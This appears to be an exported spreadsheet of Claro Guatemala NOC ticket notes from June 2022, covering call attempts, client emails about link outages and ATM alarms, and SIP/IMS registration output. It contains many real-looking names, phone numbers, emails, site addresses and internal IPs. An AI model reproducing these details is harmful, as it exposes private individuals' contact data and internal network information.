PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; ELVYN ARIEL LOPEZ RECINOS &lt;ELVYN.LOPEZ@CLARO.COM.GT&gt;; MANUEL BERGES &lt;MANUEL.B@ALLIEDGLOBAL.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: NETWORKING &lt;NETWORKING@ALLIEDGLOBAL.COM&gt;; NOC ALLIED GLOBAL &lt;NOC@ALLIEDGLOBAL.COM&gt;; NETWORKING &lt;NETWORKING@ALLIEDGLOBAL.COM&gt;; DAVID MARROQUIN &lt;DAVID.M@ALLIEDGLOBAL.COM&gt;
ASUNTO: RE: REVISIÓN CON SERVICIO ID 412500001 INTERNET PACIFIC 06/26/2022
BUEN DIA CLARO,
TENDRÁN ALGÚN AVANCE DE LAS REVISIONES SOLICITADAS?
REGARDS,
...</t>
  </si>
  <si>
    <t>--- SE RECIBE CORREO DEL CLIENTE, SE INFORMA A CNOC REACTIVO POR SKYPE. ...
DE: DIEGO PABLO AJIN HERNANDEZ
ENVIADO EL: DOMINGO, 26 DE JUNIO DE 2022 08:08
PARA: MARIO MUTZ &lt;MARIO.ML@ALLIEDGLOBAL.COM&gt;
CC: NETWORKING &lt;NETWORKING@ALLIEDGLOBAL.COM&gt;; NOC ALLIED GLOBAL &lt;NOC@ALLIEDGLOBAL.COM&gt;; NETWORKING &lt;NETWORKING@ALLIEDGLOBAL.COM&gt;; DAVID MARROQUIN &lt;DAVID.M@ALLIEDGLOBAL.COM&gt;; MANUEL BERGES &lt;MANUEL.B@ALLIEDGLOBAL.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: REVISIÓN CON SERVICIO ID 412500001 INTERNET PACIFIC 06/26/2022
MARIO.
                SE SOLICITA APOYO AL ÁREA ENCARGADA.
QUEDAMOS A LA ESPERA DE LOS COMENTARIOS POR PARTE DE GRUPO N1.
ATENTAMENTE:
DE: MARIO MUTZ [MAILTO:MARIO.ML@ALLIEDGLOBAL.COM]
ENVIADO EL: DOMINGO, 26 DE JUNIO DE 2022 08:05
PARA: DIEGO PABLO AJIN HERNANDEZ &lt;DIEGO.AJIN@CLARO.COM.GT&gt;
CC: NETWORKING &lt;NETWORKING@ALLIEDGLOBAL.COM&gt;; NOC ALLIED GLOBAL &lt;NOC@ALLIEDGLOBAL.COM&gt;; NETWORKING &lt;NETWORKING@ALLIEDGLOBAL.COM&gt;; DAVID MARROQUIN &lt;DAVID.M@ALLIEDGLOBAL.COM&gt;; MANUEL BERGES &lt;MANUEL.B@ALLIEDGLOBAL.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: REVISIÓN CON SERVICIO ID 412500001 INTERNET PACIFIC 06/26/2022
NOS PUEDEN APOYAR CON GRAFICO DE CONSUMO DE ANCHO DE BANDA.
REGARDS,
...</t>
  </si>
  <si>
    <t>F4617344</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PERO NO SE OBSTIENE RESPUESETA
2001333747
COLA:
NOMBRE: A: 40713148
NÚMERO: 55280199
DURACIÓN: 0:00:42
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 26/06/2022 07:55:34</t>
  </si>
  <si>
    <t>F4617414</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: DOMINGO, 26 DE JUNIO DE 2022 9:38PARA: SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;; MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_TYT_GT_ATM278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7414
ID: 47502107T
IDENTIFICADOR DEL CLIENTE:  CC_TYT_GT_ATM2783
UBICADO EN: CAJERO 2783 FARMACIA CRUZ VERDE 2.- 4TA. CALLE 3-06 ZONA 3, JUTIAPA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4617417</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: DOMINGO, 26 DE JUNIO DE 2022 10:13PARA: SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;; MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_TYT_GT_ATM006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7417
ID: 806300192T
IDENTIFICADOR DEL CLIENTE:  CC_TYT_GT_ATM0068
UBICADO EN:  BANCO GRANAI &amp; TOWNSON, JUTIAPA - CALLE 15 DE SEPTIEMBRE Y 10 AVENIDA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>RESPUESTA DEL CLIENTE
DE: SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;ENVIADO: DOMINGO, 26 DE JUNIO DE 2022 10:33PARA: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;ASUNTO: RE: [SOLICITUD :##RE-766119##] : ENLACE ALARMADO PARA CLIENTE "CC_TYT_GT_ATM0068"
BUENOS DIAS, ATM ADMINITRADO POR LA AGENCIA , CERRADO HOY, SE  LLAMARA MAÑANA.  NO TENEMOS CONOCIMIENTO QUE HAYA ALGUN PROBLEMA EN EL AREA.
SERVICIOS 5B</t>
  </si>
  <si>
    <t>F4617461</t>
  </si>
  <si>
    <t>SE UBICA CONTACTO EN TICKETS ANTERIORES, ESTUARDO VALDEZ 58112467  SIN EMBARGO ENVIA A BUZON.
2001375074
COLA:
NOMBRE: A: 58112467
NÚMERO: 58112467
DURACIÓN: 0:00:45
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 58112467
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 26/06/2022 13:19:28</t>
  </si>
  <si>
    <t>F4617463</t>
  </si>
  <si>
    <t>SE HABLA CON CLIENTE RODRIGO  GARCIA PAREDES 24104328 // SE CONSULTA SOBRE SERVICIO // COMENTA QUE LO VEN OPERATIVO //</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE TAROT 55194520 A SUGERENCIA DE SUPERVISOR FRANCISCO YA QUE CON EL SE PUEDE COORDINAR Y VERIFICAR TEMA DE LA FIBRA LUEGO DE TELLABS QUE LE PERTENECE A UFINET || NO CONTESTA LLAMADAS
AUN SIN RESPUESTA A CORREO ENVIADO CON DATOS DE TECNICO
ASUNTO: RE: ENLACE CAÍDO R2 - TICKET #1138730
2001628615
COLA:
NOMBRE: A: 55194520
NÚMERO: 55194520
DURACIÓN: 0:00:40
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 55194520
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 27/06/2022 20:07:30
2001628531
COLA:
NOMBRE: A: 55194520
NÚMERO: 55194520
DURACIÓN: 0:00:42
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 55194520
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 27/06/2022 20:07:37</t>
  </si>
  <si>
    <t>SE VALIDA COMENTARIO, SOLICITANDO SE ENVIE A PERSONAL TECNICO
SE LLAMA A CLIENTE JOSE TAROT 55194520 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001596980</t>
  </si>
  <si>
    <t>*/*/*/*/CLIENTE JOSE TAROT INDICA QUE SOLO SE LE PUEDE CONTACTAR POR LLAMADA EN WHATSAPP YA QUE NO HAY SEÑAL DE CLARO EN EL LUGAR, SE LE NOTIFICA A CNOC Y SE LE INDICA QUE ELLOS RESPONDERAN*/*/*/
DE: KANDY KRYSTINA CORONADO RAMON
ENVIADO EL: LUNES, 27 DE JUNIO DE 2022 10:33
PARA: JOSE DANIEL TAROTT &lt;JOSE.TAROTT@SOMOSCMI.COM&gt;; ANA CECILIA POZUELOS PACHECO &lt;ANA.POZUELOS@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;
CC: ERICKA LOPEZ &lt;ERICKA.LOPEZ@SOMOSCMI.COM&gt;; JHONNATAN AGUILAR &lt;JHONNATAN.AGUILAR@SOMOSCMI.COM&gt;; PEDRO DE LEON &lt;PEDRO.DELEON@SOMOSCMI.COM&gt;; CARLOS RENE PORTILLO SEN &lt;CARLOS.PORTILLO@SOMOSCMI.COM&gt;; JUAN MANUEL LOPEZ &lt;JUAN.LOPEZM@SOMOSCMI.COM&gt;; JUAN JOSE ANLEU SARAVIA &lt;JUAN.ANLEU@CLARO.COM.GT&gt;; DAVID DEL VALLE &lt;DAVID.DELVALLE@SOMOSCMI.COM&gt;; MARIO ALBERTO TRABANINO IXCOT &lt;MARIO.TRABANINO@CLARO.COM.GT&gt;; DAVID ANDREE LARRAÑAGA CHINCHILLA &lt;DAVID.LARRANAGA@CLARO.COM.GT&gt;; ANGELO MAURICIO VALLEJOS &lt;ANGELO.VALLEJOS@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE CAÍDO R2 - TICKET #1138730
BUENOS DÍAS JOSÉ,
            DANDO SEGUIMIENTO A SU CASO, HEMOS TRASLADADO LA INFORMACIÓN AL ÁREA CORRESPONDIENTE PARA PROCEDER, QUEDAMOS A LA ESPERA DE LOS COMENTARIOS DE CNOC CA.
CUALQUIER CONSULTA ESTAMOS A LA ORDEN.
----------------------------------------
DE: JOSE DANIEL TAROTT [MAILTO:JOSE.TAROTT@SOMOSCMI.COM]
ENVIADO EL: LUNES, 27 DE JUNIO DE 2022 10:25
PARA: KANDY KRYSTINA CORONADO RAMON &lt;KANDY.CORONADO@CLARO.COM.GT&gt;; ANA CECILIA POZUELOS PACHECO &lt;ANA.POZUELOS@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;
CC: ERICKA LOPEZ &lt;ERICKA.LOPEZ@SOMOSCMI.COM&gt;; JHONNATAN AGUILAR &lt;JHONNATAN.AGUILAR@SOMOSCMI.COM&gt;; PEDRO DE LEON &lt;PEDRO.DELEON@SOMOSCMI.COM&gt;; CARLOS RENE PORTILLO SEN &lt;CARLOS.PORTILLO@SOMOSCMI.COM&gt;; JUAN MANUEL LOPEZ &lt;JUAN.LOPEZM@SOMOSCMI.COM&gt;; JUAN JOSE ANLEU SARAVIA &lt;JUAN.ANLEU@CLARO.COM.GT&gt;; DAVID DEL VALLE &lt;DAVID.DELVALLE@SOMOSCMI.COM&gt;; MARIO ALBERTO TRABANINO IXCOT &lt;MARIO.TRABANINO@CLARO.COM.GT&gt;; DAVID ANDREE LARRAÑAGA CHINCHILLA &lt;DAVID.LARRANAGA@CLARO.COM.GT&gt;; ANGELO MAURICIO VALLEJOS &lt;ANGELO.VALLEJOS@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE CAÍDO R2 - TICKET #1138730
BUEN DÍA ACÁ EN EL SITIO DONDE ESTA EL ROUTER DE CLARO NO TENGO SEÑAL DE CLARO POR LO CUAL SOLO VAN A PODER CONTACTARME VIA WHATSAPP YA QUE NO HAY SEÑAL CELULAR.</t>
  </si>
  <si>
    <t>F4617477</t>
  </si>
  <si>
    <t>RESPUESTA DEL CLIENTE
DE: SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;ENVIADO: DOMINGO, 26 DE JUNIO DE 2022 10:36PARA: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;ASUNTO: RE: [SOLICITUD :##RE-766122##] : ENLACE ALARMADO PARA CLIENTE "CC_TYT_GT_ATM3792"
SE ENVIO SUPERVISOR  A VERIFICAR.
SERVICIOS 5BPBX: (502) 2420-7200</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: DOMINGO, 26 DE JUNIO DE 2022 10:23PARA: SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;; MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_TYT_GT_ATM37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7477
ID: 47502494T
IDENTIFICADOR DEL CLIENTE:  CC_TYT_GT_ATM3792
UBICADO EN:  3 CALLE 3-41 ZONA 3 JUTIAPA FARMACIA GALENO
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4617522</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KELVIN MARTINEZ 77479205 ENTERADO DE QUE SE CANCELA VISITA, EL ENTERADO Y CUALQUIER COSA QUETA ATENTO SI SE REPROGRAMA
2001376340
COLA:
NOMBRE: A: 0050377479205
NÚMERO: 0050377479205
DURACIÓN: 0:01:48
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 0050377479205
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 26/06/2022 13:30:56</t>
  </si>
  <si>
    <t>F4617555</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE OSCAR ESTUARDO 47304102 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001517521</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WALTER RESYES 45787911 MENCIONA QUE YA OBSERVA EL SERVICIO FUNCIONANDO DE MANERA CORRECTA
-ID 2001517902</t>
  </si>
  <si>
    <t>F4617660</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DAVID RAMOS AL 41247493 NO RESPONDE, ENVIA A BUZON DE VOZ ||
SE INTENTARA LUEGO**
-ID 2001434341
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARVIN ORTIZ COMENTA QUE SE PUEDA REALIZAR LA VISITA EL DIA DE MAÑANA A PARTIR DE LA 1 DE LA TARDE,
3001238189
COLA:
NOMBRE: A: 59890598
NÚMERO: 59890598
DURACIÓN: 0:03:00
ESTADO: CONECTADA
DETALLES: 59890598
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 30/06/2022 19:17:43</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DAVID RAMOS AL 41247493 INDICA QUE NO ESTA EN SITIO PERO SOLICITA QUE SE LE LLAME AL SEÑOR MARVIN ORTIZ 59890598 PARA REALIZAR PRUEBAS**
-ID 3001209535
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARVIN ORTIZ 59890598 SOLICITA QUE SE LE LLAME EN 30 MIN YA QUE NO ESTA AHORITA EN SITIO **
-ID 3001211598
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  MARVIN ORTIZ 59890598 MENCIONA QUE YA APLICO REINICIO A LOS EQUIPOS PERO PERSISTE EL INCONVENIENTE
-ID 3001219682</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  MARVIN ORTIZ 59890598 SE SOLICITAN DATOS DE UNA POSIBLE VISITA TECNICA
-ID 3001221818
NOMBRE DEL CLIENTE: IGLESIA DE JESUCRISTO
UBICACIÓN:1 AVENIDA 2-62 ZONA 01, SAN FRANCISCO ZAPOTITLAN,
CONTACTO EN SITIO: MARVIN ORTIZ 59890598
HORARIO DE ATENCION: LLAMAR 5 A 10 MIN CUANDO YA ESTEN EN PR
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DAVID RAMOS AL 41247493 INDICA QUE NO SE ENCUENTRA EN SITIO PERO QUE YA ESTAN VIENDO EL PROBLEMA INTERNAMENTE Y SE LE PODRIA LLAMAR EL DIA JUEVES A LAS 16:00 HRS PARA SEGUIMIENTO Y SI AUN ES NECESARIO REALIZAR PRUEBAS SERIA HASTA EL DOMINGO **
-ID 2001474451
**
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DAVID RAMOS AL 41247493 NO RESPONDE, ENVIA A BUZON DE VOZ ||
SE INTENTARA LUEGO**
-ID 2001419184
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DAVID RAMOS AL 41247493 SIGUE SIN RESPONDER, ENVIA A BUZON DE VOZ ||
SE INTENTARA LUEGO**
-ID 2001455022
**</t>
  </si>
  <si>
    <t>F4617720</t>
  </si>
  <si>
    <t>DE: ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;
ENVIADO: DOMINGO, 26 DE JUNIO DE 2022 15:44
PARA: JHONNSER JEHONADAS ESCOBAR LUCERO &lt;JHONNSER.ESCOBAR@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; WALTER ANIBAL REYES &lt;WALTER.REYES@SOMOSCMI.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
CC: HELPDESK. &lt;HELPDESK@CAMPERO.COM&gt;; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;
ASUNTO: RE: C112 - SIN INTERNET DATOS CON LENTITUD 625900154, 625900173, 38300607,
BUENAS TARDES ESTIMADOS (A)
COMO PARTE DEL SEGUIMIENTO AL CASO SE ENVÍAN GRAFICAS 625900154T (FIGURA 1-2). EN LAS MISMA SE PUEDE APRECIAR SERVICIO SE MANTIENE ACTIVO CON EQUIPOS ASOCIADOS. DE LOS SIGUIENTES SERVICIOS. PARA EL SERVICIO 38300607T SE ADJUNTAN LAS FIGURA 3-4 GRAFICAS DE LA ÚLTIMA HORA Y LAS 24 HORAS. EN LA ÚLTIMA HORA SE OBSERVA CONSUMO POR ENCIMA DEL 1MB POR LO QUE SE ENCUENTRA SATURANDO EL SERVICIO. QUEDAMOS AL PENDIENTE. GRACIAS DE ANTEMANO</t>
  </si>
  <si>
    <t>F4617865</t>
  </si>
  <si>
    <t>SE LE NOTIFICA VIA CORREO A CLIENTE//ESPERAMOS RESPUESTA DEL MISMO
ELVYN ARIEL LOPEZ RECINOS
BUENA NOCHE ESTIMADO CLIENTE;
SE LE INFORMA QUE SE REALIZARON LAS VERIFICACIONES EN NUESTROS NODOS CENTRALES Y NO TENEMOS AFECTACIÓN, NO SE ALCANZAN LOS EQUIPOS DE UM UBICADO EN LAS INSTALACIONES DEL CLIENTE, POR LO QUE SOLICITAMOS REALIZAR PRUEBAS DE PRIMER NIVEL, SU APOYO EN PROPORCIONAR CONTACTOS DE SITIO Y HORARIO DE ATENCIÓN.
SALUDOS</t>
  </si>
  <si>
    <t>F4617964</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE NELSON 46843775 MENCIONA QUE EL INCONVENIENTE PERSISTE, SE SOLICITARON DATOS DE VISITA
-ID 2001555106
NOMBRE DEL CLIENTE: JOHNNYS CONDOHOTEL, SOCIEDAD ANONIMA
UBICACIÓN:CALLE DE LOS HOTELEROS MONTERRICO TASCISCO SANTA ROSA
CONTACTO EN SITIO: YESICA - 59678406
HORARIO DE ATENCION:HASTA LAS 21 HRS
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS PERO NOTIFICAR UNOS MINUTOS ANTES DE QUE PERSONAL LLEGUE A PR</t>
  </si>
  <si>
    <t>F4618236</t>
  </si>
  <si>
    <t>EN LINEA CON CLIENTE JOSUE  VELIZ 55554795, NOS TIENE EN ESPERA EN LO QUE UBICA SU PLANTA PBX. 2001418086</t>
  </si>
  <si>
    <t>LUEGO DE REINICIAR SU PLANTA PBX LAS LLAMADAS AL GDN 24241111 COMPLETAN, . CLIENTE JOSUE VELIZ VALIDA QUE YA TIENEN LLAMADAS ENTRANTES Y SALIENTES. AUTORIZA EL CIERRE DEL TICKET. ID:  2001420437</t>
  </si>
  <si>
    <t>F4618256</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GLENDA GONZALEZ AL 57917400 INDICA QUE AUN NO PUEDE REALIZAR DESCARGAS Y NO PUEDE CARGAR ARCHIVOS || SE NOTIFICA A GESTOR **
-ID 2001426256
**</t>
  </si>
  <si>
    <t>F4618263</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL LUIS CONDE AL 78649737 INDICA QUE YA TIENE INTERNET PERO TIENE UN SW DE DONDE SALE LA FO QUE LE DA LUZ ROJA || SE LE SOLICITO UN MOMENTO A CL PERO DEJO LLAMADA EN ESPERA Y YA NO LA RETOMO ||SE NOTIFICA A GESTOR **
-ID 2001435534
**</t>
  </si>
  <si>
    <t>F4618279</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDENILSON ZAVALETA AL 73985664 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 2001444295
**</t>
  </si>
  <si>
    <t>F4618281</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE NESTOR BERNAL AL 78402741 SOLICITA QUE SE LE ENVIE CORREO CON PRUEBAS QUE EL ENLACE ESTA OPERATIVO YA QUE POR MOMENTOS A EL SE LE CAE || SE NOTIFICA A GESTOR**
-ID 2001428628
**</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE CONFORME COMENTARIO, ANTERIOR, SE PROCEDE AL CIERRE DEL INCIDENTE, ENLACE OPERATIVO A NIVEL DE CLARO, VALIDAR MEDIANTE SD, GRACIAS
ASUNTO: ENLACE OPERATIVO IDG000597 || GLOBAL OUTSOURCING S.A.</t>
  </si>
  <si>
    <t>F4618284</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RICARDO MEJIA-42432555  INDICA QUE APLICO REINICIO A PBX Y SERVICIO RESTABLECIO ##VALIDA                         ##VIVO</t>
  </si>
  <si>
    <t>F4618292</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALDANA AL 40311962 INDICA QUE NO ESTA EN SITIO QUE SE LE LLAME AL SEÑOR IVAN AL NUMERO 45107718**
-ID 2001440947
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE IVAN AL NUMERO 45107718 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 2001442483
**</t>
  </si>
  <si>
    <t>F4618293</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE AMABILIA CASTILLO 54981769 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001529271</t>
  </si>
  <si>
    <t>F4618294</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ELISEO ESCALANTE AL 79902293 - 71778009 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 2001447104 - 2001447339
**</t>
  </si>
  <si>
    <t>F4618298</t>
  </si>
  <si>
    <t>CLIENTE LILIAN RAMIREZ  44200056 APOYA REINICIANDO AETHRA EN SUS INSTALACIONES, LUEGO DEL REINICIO SE OBSERVA QUE AETHRA YA SE REGISTRA CORRECTAMENTE EN CENTRAL. SE REALIZAN LLAMADAS DE PRUEBA Y LLAMADAS COMPLETAN. CLIENTE VALIDA EL E1 ACTIVO. AUTORIZA EL CIERRE DEL CASO.
ID: 2001432318
TRUNK-NAME           CONFIG-STATUS   USERNAME                         REGISTRATION-STATUS
SIP-CLARO_TEST       ENABLE          +50222096565                     REGISTERED
TRUNKNAME    HOST                           DNSMGR USERNAME                          REFRESH STATE           REG.TIME
CLARO_TEST   10.16.246.209:5060             N      +50222096565                         2458 REGISTERED      08 JUL 1977 17:41:50
1 SIP REGISTRATIONS.
+++    CSCF/*MEID:5 MENAME:GNCYGTGV_GUARDA_VIEJO_ABAJO_CSCF*/        2022-06-27 08:44:11-06:00
O&amp;M    #1050289
%%/*1879575929 MEID=005*/EXP USRINF: ENTITYPE=PCSCF,IMPU="TEL:+50222096565";%%
RETCODE = 0  OPERATION SUCCEEDED
THE RESULT IS AS FOLLOWS:
-------------------------
                      IMPI  =  +50222096565@IMSHWI.CLARO.COM.GT
                      IMPU  =  TEL:+50222096565
                SCU NUMBER  =  119
            REGISTER STATE  =  REGISTERED
             REGISTER TIME  =  3600
             RESIDUAL TIME  =  3410
      SERVICE-ROUTE HEADER  =  &lt;SIP:ORIG@GVSCSCF1.IMSHWI.CLARO.COM.GT;LR;DPT=7CA4_EF6EC246;CA=FFFFFFFF&gt;
           CONTACT ADDRESS  =  &lt;SIP:+50222096565@10.16.109.250:21585;TRANSPORT=UDP;ANN=FIXED-ACCESS_1&gt;;Q=1.0
         ACCESS NETWORK ID  =  2
USER EQUIPMENT ACCESS TYPE  =  NOT_IMS_UE
         USER SUBSCRIBE ID  =  NULL
           USER SESSION ID  =  NULL
                USER AGENT  =  AETHRA TELECOMMUNICATIONS PBX
       ORIGINAL IP ADDRESS  =  10.78.72.242
               IFC UNSAVED  =  NO
(NUMBER OF RESULTS = 1)
---    END
+++    CSCF/*MEID:5 MENAME:GNCYGTGV_GUARDA_VIEJO_ABAJO_CSCF*/        2022-06-27 08:44:02-06:00
O&amp;M    #1050288
%%/*1879575928 MEID=005*/EXP USRINF: ENTITYPE=SCSCF,IMPU="TEL:+50222096565";%%
RETCODE = 0  OPERATION SUCCEEDED
THE RESULT IS AS FOLLOWS:
-------------------------
               IMPI  =  +50222096565@IMSHWI.CLARO.COM.GT
               IMPU  =  TEL:+50222096565
         SCU NUMBER  =  119
     REGISTER STATE  =  REGISTERED
      REGISTER TIME  =  3600
      RESIDUAL TIME  =  3419
        PATH HEADER  =  &lt;SIP:TERM@GVPCSCF1.IMSHWI.CLARO.COM.GT;LR;SSN;TYPE=V4;IP=10.16.109.250;PORT=21585;DPT=7CA2_86&gt;
    CONTACT ADDRESS  =  &lt;SIP:+50222096565@10.16.109.250:21585;TRANSPORT=UDP;ANN=FIXED-ACCESS_1&gt;;Q=1.0
 AUTHORIZATION TYPE  =  MD5
  USER SUBSCRIBE ID  =  NULL
    USER SESSION ID  =  NULL
         USER AGENT  =  AETHRA TELECOMMUNICATIONS PBX
USER PRIORITY LEVEL  =  4
        IFC UNSAVED  =  NO
  P-CSCF NETWORK ID  =  PCSCF.IMSHWI.CLARO.COM.GT
(NUMBER OF RESULTS = 1)
---    END</t>
  </si>
  <si>
    <t>F4618308</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE PR 47282458 NO RESPONDE ENVIA A BUZON, SE INTENTARA LUEGO **
-ID 2001448820
**</t>
  </si>
  <si>
    <t>**SE LLAMA A OTTO PERALTA AL NUMERO 54136232 NO RESPONDE || ENVIA A BUZON SE INTENTARA LUEGO**
-ID 2001513728
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PR 47282458 PERO ENVIA DIRECTO A BUZON, SE INTENTARA LUEGO
-ID 2001443311 - 2001443480</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  OTTO PERALTA 54136232 QUIEN BRINDA CONTACTO DE PR 47282458
-ID 2001442622</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE OTTO PERALTA 54136232 QUIEN SOLICITA LLAMADA EN 10 MIN PARA BRINDAR OTRO CONTACTO DE PR
-ID 2001437442</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PR 37600123 SUENA DESCONECTADO, SE SOLICITARA OTRO CONTACTO A LA CENTRAL
-ID 2001437137 - 2001437297</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE PR 47282458 NO RESPONDE ENVIA A BUZON, SE INTENTARA LUEGO **
-ID 2001472713
**</t>
  </si>
  <si>
